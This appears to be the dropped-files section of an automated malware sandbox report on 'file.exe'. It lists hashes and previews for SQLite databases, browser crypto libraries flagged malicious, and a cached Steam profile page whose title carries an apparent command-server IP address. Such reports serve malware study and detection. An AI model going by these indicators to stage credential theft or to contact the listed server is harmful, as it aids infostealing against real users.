                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\EHIJDH-shm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\HDGCFH

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                            Entropy (8bit):0.03862698848467049
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
                                                                                                                                                                            MD5:507BA3B63F5856A191688A30D7E2A93A
                                                                                                                                                                            SHA1:1B799649D965FF1562753A9EB9B04AC83E5D7C57
                                                                                                                                                                            SHA-256:10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
                                                                                                                                                                            SHA-512:7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\HDGCFH-shm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\JDBFII

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\JJKFBA

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                            Entropy (8bit):0.8746135976761988
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\KKKEBK

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                            Entropy (8bit):0.8467337400211222
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                            MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                            SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                            SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                            SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\freebl3.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\mozglue.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\msvcp140.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\nss3.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\softokn3.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\vcruntime140.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\a43486128347[1].exe

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                            Entropy (8bit):2.8150724101159437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:+MEM:+BM
                                                                                                                                                                            MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                            SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                            SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                            SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Unknown error

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\76561199780418869[1].htm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):34879
                                                                                                                                                                            Entropy (8bit):5.398474878938413
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2N:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPR
                                                                                                                                                                            MD5:2D2B0BE510590CE0A0E7185150678633
                                                                                                                                                                            SHA1:E8118C92C257C5E3BFCB2DDDA851F02D9A99BBF0
                                                                                                                                                                            SHA-256:14054ABADFD5540F5CC3B80EA7D2A0B26CD158BD63223E7EE4E3CF34DBC0011A
                                                                                                                                                                            SHA-512:2A5E53D37B9D6F56A8CA8EC326DFEE40D3D766CA94DDF371770A7E319F622DC547C39320D2836469294290608709909C4EC2750F2BF48BE879A9A4EAAE209CD0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1048575
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:t:t
                                                                                                                                                                            MD5:2A8888F6512F29288846E65FB6F83C9B
                                                                                                                                                                            SHA1:6147D53026A83E59234FF853BB2B558B208B423F
                                                                                                                                                                            SHA-256:4AEF39E4090B33644513AB820B07DDFA7DB4F8C9A3B201E2D789433D6D20BECC
                                                                                                                                                                            SHA-512:907BD31C64A819EEA40612FEB436D3F42B748566DEE4849A30C301E1A727FD899805550377D60BF54BDBA3FB7B12D0F820DB9B8BB05E37C5B386348A2D79580D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

                                                                                                                                                                            C:\Users\user\AppData\Roaming\msvcp110.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):601600
                                                                                                                                                                            Entropy (8bit):6.954085346038613
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:WykgNnlqotaCsq/0TTrG7dKM9KwdTVXs:WknLtaCsJyAJ
                                                                                                                                                                            MD5:A7303605203C978ABBEFB4033275FF0C
                                                                                                                                                                            SHA1:6779D8CEB4551F3DBA684645EE2E794C3ADE90B5
                                                                                                                                                                            SHA-256:0B1BB1E0D8BF15E28CC4528BF52153429B6318FD61B3733B6B8C86947820BFF4
                                                                                                                                                                            SHA-512:1F1BED9DF20F88AC34B118AEDB3B13FF67656A982A5909072AD2C3AA5E946C3BC1968EA564004630E4DC7F8E642B14A433265160BCB2EE845608322C98575105
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........PE..L......f...........!...&.....................................................`............@.............................x.......<............................@..8...P...................................@...............P............................text...C........................... ..`.rdata...k.......l..................@..@.data........ ......................@....reloc..8....@......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                            Entropy (8bit):4.391136854628721
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:Zl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuN1xOBSqa:v4vF0MYQUMM6VFYLxU
                                                                                                                                                                            MD5:DCD88EA6B7305254DE47653C23AEB417
                                                                                                                                                                            SHA1:CF9B3AFC4F2D6B2775780C4FEAA3C4B0633A6BE9
                                                                                                                                                                            SHA-256:D952AB8B198AFDC603CEE5F43625F6F7843739C63729FDE7B314100F5A153643
                                                                                                                                                                            SHA-512:0BF7C7CAE03E5076F81D2A854F2CBAD9AE06AC18D9C6F9A2B21039937ED3A2F0E833CF54E8847BE73AFB3A1A97EC1B0484E2C7B87C2B28B7A5AE1217F8168535
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:regfG...G....\.Z.................... ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ..f3.................................................................................................................................................................................................................................................................................................................................................R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

